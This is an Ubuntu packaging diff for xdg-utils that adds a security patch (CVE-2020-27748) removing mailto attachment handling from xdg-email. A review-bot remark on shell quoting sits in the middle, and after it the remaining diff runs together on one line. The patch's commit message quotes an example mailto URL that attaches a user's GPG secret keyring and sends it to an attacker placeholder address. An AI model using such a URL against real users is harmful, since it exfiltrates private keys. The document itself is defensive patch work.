diff -Nru xdg-utils-1.1.3/debian/changelog xdg-utils-1.1.3/debian/changelog
--- xdg-utils-1.1.3/debian/changelog 2020-03-29 23:38:09.000000000 +0000
+++ xdg-utils-1.1.3/debian/changelog 2020-11-24 17:26:08.000000000 +0000
@@ -1,3 +1,12 @@
+xdg-utils (1.1.3-2ubuntu2) hirsute; urgency=medium
+
+ * SECURITY UPDATE: local file inclusion vulnerability
+ - debian/patches/CVE-2020-27748.patch: remove attachment handling from
+ mailto in scripts/xdg-email.in.
+ - CVE-2020-27748
+
+ -- Leonidas S. Barbosa Tue, 24 Nov 2020 14:26:08 -0300
+
 xdg-utils (1.1.3-2ubuntu1) focal; urgency=medium

 * Sync with Debian. Remaining change:
diff -Nru xdg-utils-1.1.3/debian/patches/CVE-2020-27748.patch xdg-utils-1.1.3/debian/patches/CVE-2020-27748.patch
--- xdg-utils-1.1.3/debian/patches/CVE-2020-27748.patch 1970-01-01 00:00:00.000000000 +0000
+++ xdg-utils-1.1.3/debian/patches/CVE-2020-27748.patch 2020-11-24 17:26:08.000000000 +0000
@@ -0,0 +1,55 @@
+From 1f199813e0eb0246f63b54e9e154970e609575af Mon Sep 17 00:00:00 2001
+From: =?UTF-8?q?J=C3=B6rg=20Thalheim?=
+Date: Tue, 18 Aug 2020 16:52:24 +0100
+Subject: [PATCH] xdg-email: remove attachment handling from mailto
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This allows attacker to extract secrets from users:
+
+mailto:sid@evil.com?attach=/.gnupg/secring.gpg
+
+See also https://bugzilla.mozilla.org/show_bug.cgi?id=1613425
+and https://gitlab.freedesktop.org/xdg/xdg-utils/-/issues/177
+
+Signed-off-by: Jörg Thalheim
+---
+ scripts/xdg-email.in | 7 +------
+ 1 file changed, 1 insertion(+), 6 deletions(-)
+
+diff --git a/scripts/xdg-email.in b/scripts/xdg-email.in
+index 6db58ad..5d2f4f3 100644
+--- a/scripts/xdg-email.in
++++ b/scripts/xdg-email.in
+@@ -32,7 +32,7 @@ _USAGE
+
+ run_thunderbird()
+ {
+- local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY ATTACH
++ local THUNDERBIRD MAILTO NEWMAILTO TO CC BCC SUBJECT BODY
+ THUNDERBIRD="$1"
+ MAILTO=$(echo "$2" | sed 's/^mailto://')
+ echo "$MAILTO" | grep -qs "^?"
+@@ -48,7 +48,6 @@ run_thunderbird()
+ BCC=$(/bin/echo -e $(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }'))
+ SUBJECT=$(echo "$MAILTO" | grep '^subject=' | tail -n 1)
+ BODY=$(echo "$MAILTO" | grep '^body=' | tail -n 1)
+- ATTACH=$(/bin/echo -e $(echo "$MAILTO" | grep '^attach=' | sed 's/^attach=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }' | sed 's/,$//'))
+
+ if [ -z "$TO" ] ; then
+ NEWMAILTO=
+@@ -68,10 +67,6 @@ run_thunderbird()
+ NEWMAILTO="${NEWMAILTO},$BODY"
+ fi
+
+- if [ -n "$ATTACH" ] ; then
+- NEWMAILTO="${NEWMAILTO},attachment='${ATTACH}'"
+- fi
+-
+ NEWMAILTO=$(echo "$NEWMAILTO" | sed 's/^,//')
+ DEBUG 1 "Running $THUNDERBIRD -compose \"$NEWMAILTO\""
+ "$THUNDERBIRD" -compose "$NEWMAILTO"
+--
+GitLab
+
diff -Nru xdg-utils-1.1.3/debian/patches/debian-changes xdg-utils-1.1.3/debian/patches/debian-changes
--- xdg-utils-1.1.3/debian/patches/debian-changes 2020-03-29 23:38:09.000000000 +0000
+++ xdg-utils-1.1.3/debian/patches/debian-changes 2020-11-24 17:26:08.000000000 +0000
@@ -11,6 +11,18 @@
 ---
+Index: xdg-utils-1.1.3/autotests/t-xdg-open.sh
+===================================================================
+Index: xdg-utils-1.1.3/scripts/xdg-email.in
+===================================================================
+Index: xdg-utils-1.1.3/scripts/xdg-mime.in
+===================================================================
+Index: xdg-utils-1.1.3/scripts/xdg-open.in
+===================================================================
+Index: xdg-utils-1.1.3/scripts/xdg-screensaver.in
+===================================================================
+Index: xdg-utils-1.1.3/scripts/xdg-utils-common.in
+===================================================================
 --- xdg-utils-1.1.3.orig/autotests/t-xdg-open.sh
 +++ xdg-utils-1.1.3/autotests/t-xdg-open.sh
 @@ -129,13 +129,6 @@ mock_desktop_file mosaic %u
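Review bot: The removed ATTACH line is only one instance of a pattern that survives on the new side: the BCC assignment carried in the nested `@@ -48,7 +48,6 @@` hunk still wraps an unquoted command substitution in `/bin/echo -e $(...)`, so the percent-decoded recipient text is word-split and glob-expanded by the shell before it is joined into the compose string (ShellCheck SC2046), and the TO and CC assignments outside this hunk presumably have the same shape. Quoting the inner substitution, `BCC=$(/bin/echo -e "$(echo "$MAILTO" | grep '^bcc=' | sed 's/^bcc=//;s/%\(..\)/\\x\1/g' | awk '{ printf "%s,",$0 }')")`, keeps the value intact without changing the decoding. The subject and body fields are still concatenated comma-separated into the single argument handed to `"$THUNDERBIRD" -compose`, so it is worth confirming in the part of run_thunderbird that splits MAILTO, which lies outside this hunk, that those values stay percent-encoded and cannot carry the separator characters the -compose key/value grammar uses. run_thunderbird opens inside the hunk but most of its body, including where TO and CC are parsed, is outside it.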
@@ -45,7 +57,7 @@ test_generic_open_file test.txt --- xdg-utils-1.1.3.orig/scripts/xdg-email.in +++ xdg-utils-1.1.3/scripts/xdg-email.in -@@ -91,13 +91,13 @@ open_kde() +@@ -86,13 +86,13 @@ open_kde() fi if which $kreadconfig >/dev/null 2>&1; then @@ -65,7 +77,7 @@ if echo "$client" | grep -Eq 'thunderbird|icedove'; then run_thunderbird "$client" "$1" -@@ -472,7 +472,7 @@ case "$DE" in +@@ -467,7 +467,7 @@ case "$DE" in open_gnome "${mailto}" ;; diff -Nru xdg-utils-1.1.3/debian/patches/series xdg-utils-1.1.3/debian/patches/series --- xdg-utils-1.1.3/debian/patches/series 2020-03-29 23:38:09.000000000 +0000 +++ xdg-utils-1.1.3/debian/patches/series 2020-11-24 17:26:08.000000000 +0000 @@ -1 +1,2 @@ +CVE-2020-27748.patch debian-changes